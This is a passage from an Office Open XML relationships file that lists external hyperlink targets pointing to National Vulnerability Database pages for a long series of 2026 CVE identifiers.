Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52023" TargetMode="External" Id="rId2643" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52481" TargetMode="External" Id="rId2644" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52770" TargetMode="External" Id="rId2645" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52829" TargetMode="External" Id="rId2646" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52856" TargetMode="External" Id="rId2647" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52878" TargetMode="External" Id="rId2648" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52879" TargetMode="External" Id="rId2649" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52880" TargetMode="External" Id="rId2650" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53503" TargetMode="External" Id="rId2651" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53504" TargetMode="External" Id="rId2652" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53505" TargetMode="External" Id="rId2653" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53587" TargetMode="External" Id="rId2654" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53599" TargetMode="External" Id="rId2655" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54293" TargetMode="External" Id="rId2656" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54598" TargetMode="External" Id="rId2657" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54599" TargetMode="External" Id="rId2658" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54638" TargetMode="External" Id="rId2659" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54788" TargetMode="External" Id="rId2660" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55099" TargetMode="External" Id="rId2661" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55215" TargetMode="External" Id="rId2662" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55484" TargetMode="External" Id="rId2663" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55524" TargetMode="External" Id="rId2664" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55525" TargetMode="External" Id="rId2665" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55552" TargetMode="External" Id="rId2666" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55553" TargetMode="External" Id="rId2667" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55584" TargetMode="External" Id="rId2668" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55620" TargetMode="External" Id="rId2669" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55784" TargetMode="External" Id="rId2670" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55841" TargetMode="External" Id="rId2671" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56671" TargetMode="External" Id="rId2672" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56673" TargetMode="External" Id="rId2673" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5680" TargetMode="External" Id="rId2674" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56845" TargetMode="External" Id="rId2675" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57098" TargetMode="External" Id="rId2676" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57099" TargetMode="External" Id="rId2677" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58011" TargetMode="External" Id="rId2678" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58015" TargetMode="External" Id="rId2679" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5946" TargetMode="External" Id="rId2680" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-59902" TargetMode="External" Id="rId2681" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-61686" TargetMode="External" Id="rId2682" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62295" TargetMode="External" Id="rId2683" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62296" TargetMode="External" Id="rId2684" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62317" TargetMode="External" Id="rId2685" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62759" TargetMode="External" Id="rId2686" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62813" TargetMode="External" Id="rId2687" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6285" TargetMode="External" Id="rId2688" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62999" TargetMode="External" Id="rId2689" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6321" TargetMode="External" Id="rId2690" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6322" TargetMode="External" Id="rId2691" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63222" TargetMode="External" Id="rId2692" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63408" TargetMode="External" Id="rId2693" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63421" TargetMode="External" Id="rId2694" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63462" TargetMode="External" Id="rId2695" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63495" TargetMode="External" Id="rId2696" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6377" TargetMode="External" Id="rId2697" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64374" TargetMode="External" Id="rId2698" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65819" TargetMode="External" Id="rId2699" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-65984" TargetMode="External" Id="rId2700" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66304" TargetMode="External" Id="rId2701" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66307" TargetMode="External" Id="rId2702" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-66373" TargetMode="External" Id="rId2703" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67376" TargetMode="External" Id="rId2704" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67422" TargetMode="External" Id="rId2705" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67865" TargetMode="External" Id="rId2706" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67918" TargetMode="External" Id="rId2707" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67977" TargetMode="External" Id="rId2708" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67991" TargetMode="External" Id="rId2709" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68005" TargetMode="External" Id="rId2710" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68500" TargetMode="External" Id="rId2711" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6857" TargetMode="External" Id="rId2712" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68887" TargetMode="External" Id="rId2713" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6893" TargetMode="External" Id="rId2714" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69185" TargetMode="External" Id="rId2715" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69222" TargetMode="External" Id="rId2716" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69329" TargetMode="External" Id="rId2717" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69342" TargetMode="External" Id="rId2718" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69378" TargetMode="External" Id="rId2719" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69397" TargetMode="External" Id="rId2720" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69428" TargetMode="External" Id="rId2721" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69429" TargetMode="External" Id="rId2722" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69443" TargetMode="External" Id="rId2723" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69514" TargetMode="External" Id="rId2724" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69539" TargetMode="External" Id="rId2725" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69587" TargetMode="External" Id="rId2726" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69588" TargetMode="External" Id="rId2727" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69599" TargetMode="External" Id="rId2728" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69607" TargetMode="External" Id="rId2729" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69631" TargetMode="External" Id="rId2730" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69710" TargetMode="External" Id="rId2731" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69739" TargetMode="External" Id="rId2732" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69744" TargetMode="External" Id="rId2733" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69760" TargetMode="External" Id="rId2734" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69793" TargetMode="External" Id="rId2735" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69803" TargetMode="External" Id="rId2736" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69804" TargetMode="External" Id="rId2737" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69805" TargetMode="External" Id="rId2738" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69809" TargetMode="External" Id="rId2739" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69852" TargetMode="External" Id="rId2740" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69881" TargetMode="External" Id="rId2741" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69890" TargetMode="External" Id="rId2742" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69929" TargetMode="External" Id="rId2743" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69930" TargetMode="External" Id="rId2744" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70065" TargetMode="External" Id="rId2745" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70124" TargetMode="External" Id="rId2746" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70570" TargetMode="External" Id="rId2747" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70579" TargetMode="External" Id="rId2748" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70587" TargetMode="External" Id="rId2749" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70601" TargetMode="External" Id="rId2750" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71092" TargetMode="External" Id="rId2751" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71314" TargetMode="External" Id="rId2752" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71316" TargetMode="External" Id="rId2753" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71321" TargetMode="External" Id="rId2754" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71330" TargetMode="External" Id="rId2755" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71360" TargetMode="External" Id="rId2756" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71488" TargetMode="External" Id="rId2757" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71626" TargetMode="External" Id="rId2758" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72871" TargetMode="External" Id="rId2759" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72914" TargetMode="External" Id="rId2760" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72915" TargetMode="External" Id="rId2761" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72923" TargetMode="External" Id="rId2762" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72928" TargetMode="External" Id="rId2763" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72932" TargetMode="External" Id="rId2764" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72943" TargetMode="External" Id="rId2765" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72949" TargetMode="External" Id="rId2766" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72954" TargetMode="External" Id="rId2767" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72989" TargetMode="External" Id="rId2768" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73017" TargetMode="External" Id="rId2769" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73088" TargetMode="External" Id="rId2770" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73089" TargetMode="External" Id="rId2771" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73246" TargetMode="External" Id="rId2772" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73249" TargetMode="External" Id="rId2773" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73285" TargetMode="External" Id="rId2774" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73406" TargetMode="External" Id="rId2775" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73415" TargetMode="External" Id="rId2776" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73418" TargetMode="External" Id="rId2777" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73493" TargetMode="External" Id="rId2778" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73507" TargetMode="External" Id="rId2779" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73561" TargetMode="External" Id="rId2780" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73785" TargetMode="External" Id="rId2781" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73786" TargetMode="External" Id="rId2782" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74761" TargetMode="External" Id="rId2783" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75328" TargetMode="External" Id="rId2784" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75368" TargetMode="External" Id="rId2785" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75371" TargetMode="External" Id="rId2786" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75413" TargetMode="External" Id="rId2787" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75438" TargetMode="External" Id="rId2788" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75465" TargetMode="External" Id="rId2789" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75501" TargetMode="External" Id="rId2790" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75998" TargetMode="External" Id="rId2791" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76098" TargetMode="External" Id="rId2792" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId2793" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76560" TargetMode="External" Id="rId2794" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76905" TargetMode="External" Id="rId2795" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76956" TargetMode="External" Id="rId2796" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77108" TargetMode="External" Id="rId2797" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77124" TargetMode="External" Id="rId2798" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77384" TargetMode="External" Id="rId2799" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77438" TargetMode="External" Id="rId2800" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77465" TargetMode="External" Id="rId2801" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77494" TargetMode="External" Id="rId2802" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77498" TargetMode="External" Id="rId2803" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77499" TargetMode="External" Id="rId2804" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77501" TargetMode="External" Id="rId2805" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77502" TargetMode="External" Id="rId2806" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77771" 